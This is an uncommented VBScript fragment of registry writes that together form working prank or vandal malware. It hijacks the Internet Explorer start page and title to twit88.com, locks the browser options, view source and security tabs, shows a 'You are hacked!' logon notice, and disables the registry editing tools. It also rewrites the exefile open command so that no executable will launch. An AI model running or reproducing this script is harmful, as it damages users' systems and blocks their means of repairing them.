WshShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://twit88.com/blog", "REG_SZ" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD" WshShell.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Window Title", "twit88.com", "REG_SZ" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu","1","REG_DWORD" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions","1","REG_DWORD" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen","1","REG_DWORD" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs","1","REG_DWORD" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced","1","REG_DWORD" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab","1","REG_DWORD" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings","1","REG_DWORD" WshShell.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource","1","REG_DWORD" WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Hello!","REG_SZ" WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","You are hacked!","REG_SZ" WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD" WshShell.RegWrite "HKCR\exefile\shell\open\command\","xx %1 %*","REG_SZ"